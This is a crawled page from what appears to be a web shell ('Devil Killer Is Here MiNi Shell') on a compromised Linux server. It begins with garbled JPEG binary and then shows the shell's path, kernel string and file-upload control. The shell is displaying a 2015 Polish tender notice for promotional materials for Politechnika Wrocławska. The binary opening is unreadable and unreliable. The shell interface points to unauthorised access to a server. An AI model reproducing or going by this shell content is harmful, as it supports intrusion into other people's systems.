JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150210/29502-N-2015.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów promocyjnych dla Politechniki Wrocławskiej - 3 zadania AC/BZP/16/2015</b><br>
<b>Numer ogłoszenia: 29502 - 2015; data zamieszczenia: 10.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Wrocławska , ul. Wybrzeże Wyspiańskiego 27, 50-370 Wrocław, woj. dolnośląskie, tel. 71 3202182,3203145, faks 71 3202143.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://przetargi.pwr.edu.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjnych dla Politechniki Wrocławskiej - 3 zadania AC/BZP/16/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest:
Dostawa materiałów promocyjnych dla Politechniki Wrocławskiej. 
Zamawiający określił przedmiotową dostawę w 3 zadaniach:
Zadanie nr 1 obejmujące dostawę:
1.	Długopis metalowy - ilość sztuk 7830
2.	Długopis plastikowy - 4700 sztuk
3.	Ołówek - 3110 sztuk
4.	Zestaw piśmienniczy I	- 2925 sztuk
5.	Zestaw piśmienniczy II - 1207 sztuk
6.	Parasol - 1175 sztuk
7.	Opaski odblaskowe - 900 sztuk  
8.	Brelok żarówka z lampką LED - 450 sztuk
9.	Kubek ceramiczny z grafiką - 1480 sztuk
10.	Mini bidon z karabinkiem - 1310 sztuk
11.	Smycz reklamowa - 6010 sztuk
12.	Komplet 4 gier trikes- 2430 sztuk
13.	Jojo - 4200 sztuk
14.	Kompas z karabińczykiem - 3400 sztuk
15.	Torba bawełniana z długimi uszami - 1230 sztuk
16.	Piłeczka antystresowa	 - 2310 sztuk
17.	Torba bawełniana z krótkimi uszami	 - 1260 sztuk
18.	Notes ekologiczny z długopisem - 1585 sztuk
19.	Wizytownik - 885 sztuk
20.	Balony - 2500 sztuk
21.	Świecące pałeczki - 2500 sztuk
Szczegółowy opis przedmiotu zamówienia - Załącznik nr 4.1 do SIWZ 
Zadanie nr 2 obejmujące dostawę:
22.	Power bank - 1058 sztuk
23.	Torba na ramię z kolorowym nadrukiem - 1570 sztuk
24.	Narzędzie wielofunkcyjne - 1040 sztuk
25.	Głośniki w kształcie kuli - 100 sztuk
26.	Neocube - 560 sztuk
Szczegółowy opis przedmiotu zamówienia - Załącznik nr 4.2 do SIWZ 
Dla w/w produktów okres gwarancji wynosi nie mniej niż 12 miesięcy liczony od dnia podpisania protokołu odbioru.
Zadanie nr 3 obejmujące dostawę:
27.	Koszulki T-shirt	- 450 sztuk
28.	Koszulki T-shirt	polo - 160 sztuk
Szczegółowy opis przedmiotu zamówienia - Załącznik nr 4.3 do SIWZ 
1.2. Szczegółowy zakres obowiązków wykonania przedmiotu zamówienia znajduje się w projekcie umowy, stanowiącym Załącznik nr 5 niniejszej SIWZ.
1.3. Zamówienie obejmuje również:
a.	wykonanie próbnego egzemplarza (prototypu) do każdego rodzaju materiału promocyjnego celem akceptacji przed produkcją seryjną 
b.	dostawę materiałów pod wskazany przez Zamawiającego adres.
1.4. Dostarczane materiały promocyjne, będące przedmiotem zamówienia, powinny spełniać następujące kryteria:
a.	winny być nowe, pełnowartościowe, w pierwszym gatunku
b.	winny być pozbawione przebarwień, pęknięć, zarysowań, ewentualnie innych uszkodzeń widocznych gołym okiem
c.	poszczególne części każdego z materiałów muszą być do siebie precyzyjnie dopasowane i trwale zamocowane
d.	elementy graficzne powinny być trwale naniesione, nie mogą być starte, łatwo ścieralne przy standardowym użytkowaniu, rozmazane, popękane, ani nie mogą posiadać zmienionych kolorów w odniesieniu do zaakceptowanych egzemplarzy próbnych.
Ponadto produkty piśmiennicze winny spełniać również poniższe wymagania:
a.	wszystkie części są trwale ze sobą połączone, nie odpadają, a mechanizm uruchamiający pracuje,
b.	brak przerywania w trakcie pisania, płynność pisania,
c.	etui/opakowanie jest jednolite, bez przebarwień i bez szpar,
d.	długopis oraz pióro nie mają żadnych uszczerbków i zarysowań,
e.	wyposażone we wkłady
f.	oznakowanie na opakowaniu jest trwałe i czytelne.
Koszulki T-shirt (Zadanie nr 3) winny spełniać:
a.	jakość szwów - koszulki nie prują się, na szwach nie ma wystających nitek,
b.	kolor koszulki jest jednolity, nie ma przebarwień,
c.	jednolitość koloru sitodruku.
Zdjęcia poglądowe, o których mowa w Załącznikach 4.1 - 4.3 do SIWZ wskazują na spełnienie parametrów opisanych w załącznikach i stanowią wzór rozwiązania - odniesienie do wyglądu danego artykułu. Wzory koszulek w Zadaniu nr 3 zawierają wymagany wzór nadruku (haftu) oraz pożądany kolor.
Przedmiot umowy będzie realizowany partiami i będzie fakturowany na mocy faktur częściowych.
1.5. PRAWO OPCJI	
Zamawiający przewiduje prawo opcji stosownie do art. 34 ust. 5 ustawy Pzp polegające na ewentualnym zwiększeniu zamówienia o maksymalnie 20 % każdego asortymentu wg ceny określonej w Formularzu Ofertowym przez Wykonawcę. 
a)	Zamawiającemu przysługuje możliwość skorzystania z prawa opcji, polegającego na zwiększeniu zamówienia, do maksymalnie 20 % ilości poszczególnych materiałów promocyjnych.
b)	Prawo opcji polega na sukcesywnej dostawie poszczególnego asortymentu w ramach  dodatkowych zamówień, będących zwiększeniem zamówienia materiałów promocyjnych dla Politechniki Wrocławskiej. 
	Dodatkowe wynagrodzenie Wykonawcy zależeć będzie od ilości faktycznie zakupionych materiałów, zgodnie z przyjętym sposobem realizacji przedmiotu zamówienia w ramach prawa opcji.
	Jako podstawę rozliczania realizacji przedmiotu zamówienia w ramach prawa opcji przyjmuje się ceny jednostkowe poszczególnego asortymentu podane przez Wykonawcę w Formularzu Ofertowym.
c)	Warunkiem skorzystania z prawa opcji jest złożenie przez Zamawiającego oświadczenia woli o skorzystaniu z prawa opcji - złożenie odpowiedniego zamówienia.
d)	Zamawiający przewiduje w ramach prawa opcji wydłużenie terminu realizacji umowy do maksymalnie 13 miesięcy od dnia podpisania umowy.	
1.6. Termin wykonania dostawy strony określają na: 10 miesięcy od dnia podpisania umowy. Terminy realizacji poszczególnych materiałów będą do końca czasu trwania umowy każdorazowo ustalane z Wykonawcą, z wyprzedzeniem 10 dni roboczych przed dniem rozpoczęcia realizacji konkretnego zamówienia, przy czym termin realizacji zamówienia nie może być dłuższy niż 30 dni od dnia rozpoczęcia realizacji konkretnego zamówienia. Maksymalny termin wykonania zamówienia dla Zadania nr 1 i 3 będzie podany przez Wykonawcę w Formularzu Ofertowym i będzie on podlegał ocenie ofert w kryterium: termin wykonania zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest wnieść wadium, na cały okres związania ofertą, w wysokości: 
a) 	dla Zadania nr 1 - 6 000 zł
b)	dla Zadania nr 2 - 3 000 zł
c)	dla Zadania nr 3 - nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że należycie zrealizował/realizuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
Zadanie nr 1: minimum dwie dostawy materiałów promocyjnych na kwotę nie mniejszą niż 150 000 zł brutto każda*
Zadanie nr 2: 
minimum dwie dostawy materiałów promocyjnych  na kwotę nie mniejszą niż 70 000 zł brutto  każda*
* Dla ww. wartości wykazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wszczęcia niniejszego postępowania (tj. z dnia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych).
W przypadku składania oferty na Zadanie 1 i 2 wystarczy, że Wykonawca wykaże się wiedzą i doświadczeniem  wymaganymi dla Zadania nr 1.
Zadanie nr 3: 
minimum dwie dostawy koszulek z nadrukiem personalizowanym (z nadrukiem przygotowanym wg indywidualnego projektu) w ilości nie mniejszej niż 400 sztuk każda z dostaw.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Odnośnie dokumentów w zakresie wykazania, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, należy przedłożyć:
Próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez Wykonawcę na żądanie Zamawiającego, tj.Wykonawca przedkłada próbki: 
Dla Zadania nr 1:
1. Zestaw piśmienniczy II poz. 5
2. Parasol poz. 6
3. Kubek ceramiczny poz. 9
4. Mini bidon poz. 10
5. Kompas z karabińczykiem poz. 14
6. Torba bawełniana z długimi uszami poz. 15
7. Notes ekologiczny poz. 18
8. Wizytownik poz. 19
Dla Zadania nr 2:
1. Power bank, poz. 22
2. Torba na ramię z kolorowym nadrukiem poz. 23
3. Narzędzie wielofunkcyjne poz.24
Dla Zadania nr 3:
1. Koszulki T-shirt poz. 27 w dwóch kolorach:
                fioletowa (możliwie zbliżona do PANTONE 2685C) i
                czarna (PANTONE BLACK)
2. Koszulki T-shirt - polo poz. 28 (koszulki polo) w dwóch kolorach:
                błękitna (możliwie zbliżona do PANTONE 542 C) i
                groszkowa (możliwie zbliżona do PANTONE 7489 C)
Do oferty należy załączyć po jednym egzemplarzu (pełnowartościowym, spełniającym wszystkie wymagania wskazane odpowiednio w Załącznikach 4.1 - 4.3 do SIWZ dla danego asortymentu/artykułu) każdego wymaganego artykułu wraz z opakowaniem, jeśli jest wymagane (dotyczy Zadania, na które składania jest oferta) zgodnie z SIWZ, z nadrukowanym (wyhaftowanym, wygrawerowanym) dowolnym logotypem lub napisem (niekoniecznie wymienionym w SIWZ) wykonanym jedną z technik określonych w SIWZ. Nie należy załączać po kilka próbek tego samego materiału za wyjątkiem koszulek, które należy dostarczyć w dwóch wymaganych kolorach dla każdej z pozycji. Ponadto próbki muszą zawierać wszelkie elementy umożliwiające sprawdzenie czy dany materiał funkcjonuje prawidłowo (np. baterie, żarówki, winny być naładowane) oraz wszelkie informacje umożliwiające stwierdzenie czy dany materiał spełnia wymagania SIWZ (np. metki przy materiałach, oznaczenia pojemności / wielkości).
Próbki muszą być oznaczone, opisane w sposób umożliwiający identyfikację zarówno Wykonawcy jak i produktu np. Wykonawca: X - Notes ekologiczny z długopisem lub numer pozycji.
Zamawiający dokonana badania dołączonych próbek (wskazanego asortymentu) w odniesieniu do poszczególnych cech danego produktu opisanych odpowiednio w Załącznikach 4.1 - 4.3 do SIWZ oraz do zapisów dotyczących ogólnych parametrów wymaganych przez dostarczane artykuły, które powinny spełniać następujące kryteria:
a.	winny być nowe, pełnowartościowe, w pierwszym gatunku
b.	winny być pozbawione przebarwień, pęknięć, zarysowań, ewentualnie innych uszkodzeń widocznych gołym okiem
c.	poszczególne części każdego z materiałów muszą być do siebie precyzyjnie dopasowane i trwale zamocowane
d.	elementy graficzne powinny być trwale naniesione, nie mogą być starte, łatwo ścieralne przy standardowym użytkowaniu, rozmazane, popękane, ani nie mogą posiadać zmienionych kolorów w odniesieniu do zaakceptowanych egzemplarzy próbnych.
Ponadto produkty piśmiennicze winny spełniać również poniższe wymagania:
a.	wszystkie części są trwale ze sobą połączone, nie odpadają, a mechanizm uruchamiający pracuje płynnie
b.	brak przerywania w trakcie pisania, płynność pisania
c.	eleganckie metalowe etui jest jednolite, bez przebarwień i bez szpar
d.	długopis oraz pióro nie mają żadnych uszczerbków i zarysowań
e.	wyposażone we wkłady
f.	oznakowanie na opakowaniu jest trwałe i czytelne.
Koszuli T-shirt (Zadanie nr 3) winny spełniać:
a.	jakość szwów - koszulki nie prują się, na szwach nie ma wystających nitek
b.	kolor koszulki jest jednolity, nie ma przebarwień
c.	jednolitość koloru sitodruku</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta musi się składać z: 1. Formularza ofertowego Wykonawcy - Załącznik Nr 1 do SIWZ. 2. wykazanie zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa (jeżeli dotyczy) w oryginale 3. o ile upoważnienie nie wynika z dokumentów rejestrowych w przypadku podpisania oferty przez pełnomocnika, do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza kopię pełnomocnictwa wystawionego na reprezentanta Wykonawcy przez osoby do tego umocowane 4. zgodnie z art. 26 ust. 2b uPzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz że stosunek łączący go z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda przedstawienia pisemnego zobowiązania (oryginału) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów wraz z określeniem zakresu dostępnych wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem oraz zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b uPzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za udostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z przepisem art. 144 uPzp Zamawiający przewiduje możliwość zmian istotnych postanowień Umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku skorzystania z prawa opcji opisanego w rozdziale II pkt.1.6 SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.pwr.wroc.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Politechniki Wrocławskiej, ul. Smoluchowskiego 19, pok. 409 - Sekretariat, 50-370 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2015 godzina 10:00, miejsce: Biuro Zamówień Publicznych Politechniki Wrocławskiej, ul. Smoluchowskiego 19, pok. 409 - Sekretariat, 50-370 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 obejmujące dostawę:
1.	Długopis metalowy - ilość sztuk 7830
2.	Długopis plastikowy - 4700 sztuk
3.	Ołówek - 3110 sztuk
4.	Zestaw piśmienniczy I	- 2925 sztuk
5.	Zestaw piśmienniczy II - 1207 sztuk
6.	Parasol - 1175 sztuk
7.	Opaski odblaskowe - 900 sztuk  
8.	Brelok żarówka z lampką LED - 450 sztuk
9.	Kubek ceramiczny z grafiką - 1480 sztuk
10.	Mini bidon z karabinkiem - 1310 sztuk
11.	Smycz reklamowa - 6010 sztuk
12.	Komplet 4 gier trikes- 2430 sztuk
13.	Jojo - 4200 sztuk
14.	Kompas z karabińczykiem - 3400 sztuk
15.	Torba bawełniana z długimi uszami - 1230 sztuk
16.	Piłeczka antystresowa	 - 2310 sztuk
17.	Torba bawełniana z krótkimi uszami	 - 1260 sztuk
18.	Notes ekologiczny z długopisem - 1585 sztuk
19.	Wizytownik - 885 sztuk
20.	Balony - 2500 sztuk
21.	Świecące pałeczki - 2500 sztuk
Szczegółowy opis przedmiotu zamówienia - Załącznik nr 4.1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 obejmujące dostawę:
22.	Power bank - 1058 sztuk
23.	Torba na ramię z kolorowym nadrukiem - 1570 sztuk
24.	Narzędzie wielofunkcyjne - 1040 sztuk
25.	Głośniki w kształcie kuli - 100 sztuk
26.	Neocube - 560 sztuk
Szczegółowy opis przedmiotu zamówienia - Załącznik nr 4.2 do SIWZ 
Dla w/w produktów okres gwarancji wynosi nie mniej niż 12 miesięcy liczony od dnia podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
